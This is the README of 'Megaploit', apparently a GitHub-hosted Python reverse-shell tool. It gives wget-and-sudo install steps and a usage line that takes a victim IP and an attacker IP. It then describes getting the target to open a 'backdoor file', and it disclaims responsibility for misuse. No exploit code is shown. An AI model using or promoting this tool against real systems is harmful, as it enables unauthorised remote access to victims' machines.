Megaploit
Megaploit copied to clipboard
A hacking tool(Reverse shell) based on python-3
The Rxploit is released under a GNU GPL3 license. LICENSE.
Bug tracking and development information can be found at: Click me
Easy Install
wget https://github.com/JosephFrankFir/Megaploit/releases/download/v1.3-beta-final-update/install.sh
chmod +x ./install.sh
sudo ./install.sh
Installing
Generally, you have to install python3 and pip, which Rxploit based on. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
Using Megaploit
Rxploit can do all sorts of things. The first thing you'll want to do
is python3 server.py -rh *victim ip* -lh *your ip* -p *port*, but after that, you'll probably let target open the backdoor file.
Contributing
See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.
Warning
We are not responsible for any misuse or damage caused by this program. use this tool at your own risk!